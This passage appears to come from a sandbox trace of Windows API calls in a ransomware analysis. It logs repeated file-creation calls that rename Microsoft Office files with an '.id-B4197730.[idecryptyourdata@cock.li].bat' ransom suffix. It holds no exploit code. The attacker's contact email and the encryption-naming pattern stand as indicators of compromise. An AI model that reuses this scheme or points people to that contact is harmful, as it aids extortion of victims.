Files\\Microsoft Office\\root\\Licenses16\\WordR_Retail-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\wordr_retail-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.594] CloseHandle (hObject=0x4c4) returned 1 [0166.595] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.595] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.595] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\WordR_Retail-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\wordr_retail-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.595] CloseHandle (hObject=0x4c4) returned 1 [0166.596] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.596] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.596] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\WordR_Retail-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\wordr_retail-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.596] CloseHandle (hObject=0x4c4) returned 1 [0166.596] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.596] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.596] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\WordR_Retail-ul-phn.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\wordr_retail-ul-phn.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.597] CloseHandle (hObject=0x4c4) returned 1 [0166.597] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.597] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.597] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\WordR_Trial-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\wordr_trial-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.598] CloseHandle (hObject=0x4c4) returned 1 [0166.598] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.598] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.598] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\WordR_Trial-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\wordr_trial-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.598] CloseHandle (hObject=0x4c4) returned 1 [0166.599] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.599] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.599] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\WordR_Trial-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\wordr_trial-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.599] CloseHandle (hObject=0x4c4) returned 1 [0166.600] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.600] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.600] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\WordVL_KMS_Client-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\wordvl_kms_client-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.600] CloseHandle (hObject=0x4c4) returned 1 [0166.601] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.601] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.601] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\WordVL_KMS_Client-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\wordvl_kms_client-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.601] CloseHandle (hObject=0x4c4) returned 1 [0166.620] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.621] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.621] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\WordVL_KMS_Client-ul.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\wordvl_kms_client-ul.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.621] CloseHandle (hObject=0x4c4) returned 1 [0166.622] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.622] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.622] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\WordVL_MAK-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\wordvl_mak-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.623] CloseHandle (hObject=0x4c4) returned 1 [0166.623] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.624] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.624] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\WordVL_MAK-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\wordvl_mak-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.624] CloseHandle (hObject=0x4c4) returned 1 [0166.625] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.625] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.625] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\WordVL_MAK-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\wordvl_mak-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.625] CloseHandle (hObject=0x4c4) returned 1 [0166.822] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.822] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.822] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\WordVL_MAK-ul-phn.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\wordvl_mak-ul-phn.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.845] CloseHandle (hObject=0x51c) returned 1 [0166.858] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.858] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.859] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\DataServices\\FOLDER.ICO.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\dataservices\\folder.ico.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.859] CloseHandle (hObject=0x51c) returned 1 [0166.860] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.860] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.860] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\DBWIZ.VSL.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\dbwiz.vsl.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.861] CloseHandle (hObject=0x51c) returned 1 [0166.862] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.862] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.862] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\DOORSCHD.VRD.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\doorschd.vrd.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.862] CloseHandle (hObject=0x51c) returned 1 [0166.863] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.863] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.864] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\DRILLDWN.VSL.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\drilldwn.vsl.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.864] CloseHandle (hObject=0x51c) returned 1 [0166.865] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.865] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.865] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\DWGCNV.VSL.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\dwgcnv.vsl.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.865] CloseHandle (hObject=0x51c) returned 1 [0166.869] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.869] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.869] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\EQPLIST.VRD.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\eqplist.vrd.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.869] CloseHandle (hObject=0x51c) returned 1 [0166.870] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.870] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.870] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\EXCEL.HXS.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\excel.hxs.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.870] CloseHandle (hObject=0x51c) returned 1 [0166.872] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.872] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.872] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\EXCEL_COL.HXC.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\excel_col.hxc.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.872] CloseHandle (hObject=0x51c) returned 1 [0166.873] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.873] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.873] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\EXCEL_COL.HXT.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\excel_col.hxt.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.874] CloseHandle (hObject=0x51c) returned 1 [0166.874] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.874] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.874] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\EXCEL_F_COL.HXK.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\excel_f_col.hxk.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.875] CloseHandle (hObject=0x51c) returned 1 [0166.875] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.875] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.876] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\EXCEL_K_COL.HXK.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\excel_k_col.hxk.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.876] CloseHandle (hObject=0x51c) returned 1 [0166.881] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.881] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.881] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\FACILITY.VSL.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\facility.vsl.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.881] CloseHandle (hObject=0x51c) returned 1 [0166.882] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.882] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.882] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\FLOCH.VRD.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\floch.vrd.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.883] CloseHandle (hObject=0x51c) returned 1 [0166.885] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.885] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.885] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\GANTT.VRD.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\gantt.vrd.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.885] CloseHandle (hObject=0x51c) returned 1 [0166.886] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.887] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.887] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\GANTT.VSL.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\gantt.vsl.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.887] CloseHandle (hObject=0x51c) returned 1 [0166.887] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.888] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.888] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\GR8GALRY.GRA.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\gr8galry.gra.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.888] CloseHandle (hObject=0x51c) returned 1 [0166.889] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.889] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.889] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\GRAPH.HXS.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\graph.hxs.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.889] CloseHandle (hObject=0x51c) returned 1 [0166.890] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.890] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.890] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\GRAPH_COL.HXC.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\graph_col.hxc.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.890] CloseHandle (hObject=0x51c) returned 1 [0166.891] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.891] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.891] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\GRAPH_COL.HXT.id-B4197730.[idecryptyourdata@cock.li].bat" 